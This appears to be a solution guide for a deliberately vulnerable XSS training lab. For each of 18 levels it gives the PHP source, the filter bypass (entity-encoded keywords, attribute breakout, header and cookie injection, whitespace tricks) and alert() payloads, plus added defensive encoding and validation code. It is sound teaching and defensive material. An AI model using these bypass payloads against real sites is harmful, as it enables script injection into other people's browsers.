XSS Challenge Game Answers and Analysis Level 1-18

XSS Practice Summary (Level 1–18). This document is a reference for anyone practicing Cross-Site Scripting (XSS). It gives the answer and a short analysis for all 18 levels of the XSS game, so learners can see which payload works against which filter and why. Some payloads use HTML entity encoding, in particular numeric character references (for example &#115; for the letter s), to get past keyword filters, e.g. java&#115;cript:alert().

Level-1

  • This level is very simple: just put the payload in the URL parameter.
<script>alert(1)</script>
  • Source code analysis
$str = $_GET["name"];
echo "<h2 align=center>Welcome user".$str."</h2>";
  • Looking at the source, the name parameter taken from the URL is echoed with no filtering at all.

Level-2

  • Enter the level-1 payload and you can see that the URL parameter is converted into HTML entities.
  • View source
$str = $_GET["keyword"];
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'"> // not entity-encoded
<input type=submit name=submit value="Search"/>
</form>
  • The htmlspecialchars() function converts predefined characters into HTML entities.
  • However, the value attribute of the form input is printed without encoding. You can enter the following payload in the form:
1"><script>alert(1)</script>//
  • You can also enter the following payload in the URL:
"onclick="window.alert()
  • Click on the input box and an alert pops up.


Level-3

  • View source code directly
$str = $_GET["keyword"];
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>"."
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=search/>
</form>
  • Here the form value is also passed through htmlspecialchars(), but the attribute is single-quoted, so the payload is:
'onclick='window.alert()
  • htmlspecialchars() converts double quotes, but with its default flags it does not escape single quotes. There is a small bug in this level: the same input via the URL does not respond, although in theory it should also work.
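The fix for levels 2 and 3 is the same: encode the value for the HTML attribute context with explicit flags. The following is an added example written for this page, not code from the xss-labs project; the helper names attr(), render_form() and attribute_is_contained() are my own. Before PHP 8.1 the default flags of htmlspecialchars() were ENT_COMPAT, which leaves single quotes alone (from 8.1 on the default includes ENT_QUOTES), so passing the flags explicitly is the portable choice.

```php
<?php
// Added example (not part of the xss-labs source): one encoder for HTML
// attribute values with the flags spelled out. ENT_QUOTES encodes both
// quote kinds, so a value printed into value="..." or value='...' cannot
// close the attribute; ENT_SUBSTITUTE avoids returning an empty string on
// invalid UTF-8, which would silently hide the input.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render the search form the way levels 2 and 3 should have: the value is
// encoded once, and the same encoding is safe in either quoting style.
function render_form(string $keyword): string
{
    return '<input name=keyword value="' . attr($keyword) . '">' . "\n"
         . "<input name=keyword value='" . attr($keyword) . "'>";
}

// A check a reviewer can run: the encoded value must contain no raw quote
// or angle bracket, otherwise it could leave the attribute it is printed in.
function attribute_is_contained(string $encoded): bool
{
    return strpbrk($encoded, "\"'<>") === false;
}

// Constructed probe inputs matching the level-2 and level-3 payloads above.
$probes = [
    '"onclick="window.alert()',
    "'onclick='window.alert()",
    '1"><script>alert(1)</script>//',
];
foreach ($probes as $p) {
    $enc = attr($p);
    printf("%-35s -> %s (%s)\n", $p, $enc,
        attribute_is_contained($enc) ? 'contained' : 'BREAKS OUT');
}
echo render_form($probes[1]), "\n";
```

With ENT_QUOTES the single-quote probe is printed as &#039;onclick=&#039;window.alert() inside the attribute, which the browser shows as literal text instead of a new attribute. Note that this is attribute-context encoding only; a value placed inside a script block or a URL needs the encoding of that context.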


level-4

  • Again, look directly at the source code.
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=search/>
</form>
  • For reference, str_replace() replaces every occurrence of the search string. This call replaces "world" in "Hello world!" with "Shanghai":
<?php
echo str_replace("world","Shanghai","Hello world!");
?>
  • So in the URL and form input, "<" and ">" are replaced by the empty string, but double quotes are left alone.
  • Payload:
"onclick="window.alert()


level-5

  • Source code
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=search/>
</form>
  • You can see that <script is replaced by <scr_ipt and on by o_n, so the onclick event is no longer available.
  • Can we just change the case? No, because strtolower() converts all characters to lowercase first.
  • But you can use the following payload, which needs neither a script tag nor an on* handler:
"><a href="javascript:alert('a')">1</a>//
  • Remember to close the preceding attribute and tag, and comment out the rest of the line.


Level-6

  • View source
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=search/>
</form>
  • It can be seen that on->o_n, src->sr_c, data->da_ta, href->hr_ef.
  • But there is no strtolower() call this time, so mixed case bypasses the replacements. You can use the following payload:
1 "><a HREF="javascript:alert('a')">1</a>//


level-7

  • View source code
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=search/>
</form>
  • Uppercase is converted to lowercase and words such as script are replaced with the empty string. But each str_replace() runs only once, so writing the word inside itself (double writing) leaves the word behind after the replacement.
  • payload
"><scrscriptipt>alert(1)</scrscriptipt>//
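Why the level-7 filter fails is easiest to see by running it twice. The block below is an added example for this page, not the lab's code: it reproduces the level-7 replacement chain as level7_filter() (my name) and adds the check a reviewer would apply to any strip-style filter: if applying the filter again changes its own output, the filter was never complete. A fixed-point loop (strip_to_fixed_point(), also my name) closes that particular gap, but it is still a keyword blacklist that knows nothing about the HTML context; context-aware output encoding is the real fix.

```php
<?php
// Added example, not from the lab: the level-7 filter as a function, plus
// the stability check that shows why one pass of str_replace() is not a
// sanitizer.
const LEVEL7_WORDS = ['script', 'on', 'src', 'data', 'href'];

function level7_filter(string $s): string
{
    $s = strtolower($s);
    foreach (LEVEL7_WORDS as $word) {
        $s = str_replace($word, '', $s);   // single pass, as in the lab
    }
    return $s;
}

// A strip filter is only meaningful if applying it again changes nothing.
// Returns true when the first pass leaves a blacklisted word behind, which
// is exactly what the doubled spelling on this page produces.
function filter_is_unstable(string $s): bool
{
    $once = level7_filter($s);
    return level7_filter($once) !== $once;
}

// Iterate until the output stops changing. Closes the double-write gap
// but remains a blacklist: shown for comparison, not as the recommended fix.
function strip_to_fixed_point(string $s): string
{
    do {
        $prev = $s;
        $s = level7_filter($s);
    } while ($s !== $prev);
    return $s;
}

// Constructed input: the level-7 payload from this page.
$input = '"><scrscriptipt>alert(1)</scrscriptipt>//';
echo level7_filter($input), "\n";       // "><script>alert(1)</script>//
var_dump(filter_is_unstable($input));   // bool(true)
echo strip_to_fixed_point($input), "\n"; // "><>alert(1)</>//
```

The same instability check applies to levels 4, 5, 6 and 16, which all rely on one pass of str_replace(): any filter whose second application still changes the string is reporting its own incompleteness.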


level-8

  • Source code
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot;',$str6);
echo '
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=Add friendly link/>
</form>';
?>
<?php
 echo '<BR><a href="'.$str7.'">Friendly Links</a>';
?>
  • This level is a bit harder: the input lands in an href attribute, so the filtered keywords can be written with HTML character references, which the browser decodes before it reads the URL.
  • The payload is as follows, with the letter s written as the decimal character reference &#115;:
java&#115;cript:alert()
  • Any of the other letters (c, r, i, p, t) can be encoded the same way.


level-9

  • Source code
if(false===strpos($str7,'http://'))
{
  echo '<BR><a href="Is your link illegal? Is it?">Friendly Links</a>';
}
else
{
  echo '<BR><a href="'.$str7.'">Friendly Links</a>';
}
  • The difference from level 8 is that the friendly link now has one more check.
  • strpos()

Returns the position of the first occurrence of a string inside another string, or FALSE if the string is not found. Note: string positions start at 0, not 1. For example, to find the first occurrence of "php" in a string:

<?php
echo strpos("You love php, I love php too!","php");
?>
  • That is, the value you fill in must contain the substring http://; otherwise it is treated as malicious and the error link is printed instead.
  • The check only looks for the substring, so http:// can be placed inside a JavaScript comment: the check passes and the comment does nothing.
  • payload
javascri&#x0070;t:alert(1)/*http://www.baidu.com*/
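The level-9 check fails for two separate reasons: strpos() accepts http:// anywhere in the string, and it runs on the raw bytes while the browser decodes character references in href before looking at the scheme. The block below is an added example written for this page, not the lab's code; safe_link() and render_link() are my own names. It decodes the value once (as the browser would), parses it, and only emits it when the scheme is http or https and a host is present.

```php
<?php
// Added example, not from the lab: allowlist the URL scheme of a
// user-supplied link instead of searching for the substring "http://".
function safe_link(string $url): ?string
{
    // Decode character references once, mirroring what the browser does to
    // an href value, so the check sees the same string the browser will.
    $decoded = html_entity_decode(trim($url), ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $parts = parse_url($decoded);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                       // relative, scheme-less or unparsable
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                       // javascript:, data:, etc.
    }
    // Emit the validated URL encoded for the attribute context.
    return htmlspecialchars($decoded, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Rejected links get a fixed href rather than any part of the user input.
function render_link(string $url): string
{
    $safe = safe_link($url);
    return $safe === null
        ? '<a href="#">Friendly Links</a>'
        : '<a href="' . $safe . '">Friendly Links</a>';
}

// Constructed inputs: the two payloads from this page and a normal link.
$inputs = [
    'java&#115;cript:alert()',
    'javascri&#x0070;t:alert(1)/*http://www.baidu.com*/',
    'http://www.baidu.com/',
];
foreach ($inputs as $u) {
    echo render_link($u), "\n";
}
// Only the last input is printed with its own href; the first two decode to
// a javascript: scheme and are replaced by the fixed link.
```

The decode step matters: without it the check would see the undecoded java&#115;cript and might treat it as a harmless relative path, while the browser would still run it as a javascript: URL.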


level-10

  • Source code
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2>No results found for ".htmlspecialchars($str).".</h2>".'
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
  • The keyword parameter is useless. I was confused when I saw three input tags all with type hidden. But the goal is clear: if I change any hidden attribute to text, the input becomes visible and clickable. The only parameter that reaches the page is t_sort.
  • payload
&t_sort="onclick="alert()"type="text"
  • The & in the query string separates the two parameters, so both keyword and t_sort are sent; it plays the role of an "and".


level-11

  • Source code
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2>No results found for ".htmlspecialchars($str).".</h2>".'
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
  • Analyzing the source code, we can see $str11=$_SERVER['HTTP_REFERER'];, which takes its value from the Referer header of the request (the level-10 URL when you arrive from there).
  • When navigating from level 10, intercept the request and change the Referer header to the following payload to complete the level.
  • payload
Referer:t_sort="type="text" onclick="alert(1)


level-12

  • This level is similar to the previous one, except that the value comes from the User-Agent header. Source code:
$str11=$_SERVER['HTTP_USER_AGENT'];
  • When navigating from level 11, use Burp to intercept the request and change the User-Agent header to the following payload.
  • payload
User-Agent:t_sort="type="text" onclick="alert(1)


level-13

  • This time the value comes from the cookie. Source code:
$str11=$_COOKIE["user"]; // get the user value from the cookie
  • When navigating from level 12, use Burp to intercept the request and change the cookie to the following payload.
  • payload
Cookie:user=t_sort="type="text" onclick="alert(1);


level-14

  • Use exiftool to change the EXIF metadata of an image.
  • Uploading an image whose EXIF fields contain the XSS code triggers the XSS when the metadata is displayed.


level-15

  • View source code
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span></body>';
  • AngularJS ng-include directive

The ng-include directive is used to include external HTML files. The included content is inserted as children of the specified element. The value of the ng-include attribute can be an expression that returns a file name. By default, the included file must be on the same domain.

  • Therefore we include level 1, which reflects its name parameter unescaped. Script tags inside an included template are not executed, so the level-1 payload is replaced by an img tag with an onerror handler:
/level15.php?src='level1.php?name=test<img src=1 onerror=alert(1)>'


level-16

  • View source code
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","&nbsp;",$str);
$str3=str_replace(" ","&nbsp;",$str2);
$str4=str_replace("/","&nbsp;",$str3);
$str5=str_replace("\t","&nbsp;",$str4); // the tab character
echo "<center>".$str5."</center>";
<img src=level16.png>
<?php
echo "<h3 align=center>Payload length:".strlen($str5)."</h3>";
  • Analyzing the source code, we can see that script, /, spaces and tabs are all replaced by &nbsp;.
  • Use the img tag, with %0d (carriage return) or %0a (line feed) as the delimiter instead of the space. The payload is as follows:
?keyword=test<img%0dsrc=1%0donerror=alert(1)>


level-17

  • Source code
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
  • The <embed> tag defines embedded content, such as a plugin.
  • Firefox does not render it, but it worked for me in Google Chrome.
  • payload
?arg01=a&arg02= onmouseover=alert(1)
  • In theory onclick should also work, but the page jumps straight to the error view without showing the message.
  • The onmouseup event fires before the onclick event, which is why onmouseover is the easier choice here.


level-18

  • Source code
<?php
ini_set("display_errors", 0);
echo "<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
  • The source code is the same as level 17 apart from the file name.
  • payload
?arg01=a&arg02=b%20onmouseout=alert(1)
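Levels 17 and 18 show a context the earlier levels did not: an unquoted attribute. htmlspecialchars() leaves spaces alone, and the lab prints src=... without quotes, so a space in arg02 ends the src attribute and starts a new one. The block below is an added example written for this page, not the lab's code; build_embed() and attribute_names() are my own names. It applies the two fixes together: percent-encode the query components with http_build_query(), and always quote attribute values.

```php
<?php
// Added example, not from the lab: the <embed> tag rebuilt so that user
// input cannot start a new attribute.
function build_embed(string $arg01, string $arg02): string
{
    // http_build_query() with PHP_QUERY_RFC3986 percent-encodes key and
    // value, so spaces, quotes and '=' stay inside the query string.
    $query = http_build_query([$arg01 => $arg02], '', '&', PHP_QUERY_RFC3986);
    $src   = 'xsf01.swf?' . $query;
    // Quote every attribute and encode the whole src for the attribute context.
    return '<embed src="' . htmlspecialchars($src, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
         . '" width="100%" height="100%">';
}

// A reviewer's check: list the attribute names actually present in the tag;
// user input must not be able to add one.
function attribute_names(string $tag): array
{
    preg_match_all('/\s([a-zA-Z-]+)="[^"]*"/', $tag, $m);
    return $m[1];
}

// Constructed input: the level-18 payload from this page.
$tag = build_embed('a', 'b onmouseout=alert(1)');
echo $tag, "\n";
// <embed src="xsf01.swf?a=b%20onmouseout%3Dalert%281%29" width="100%" height="100%">
print_r(attribute_names($tag));   // src, width, height only
```

Quoting alone would have stopped the level-17/18 payload, since htmlspecialchars() already encodes the double quote; the percent-encoding is what keeps the query string itself well-formed, so the Flash object receives exactly one parameter with the intended value.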

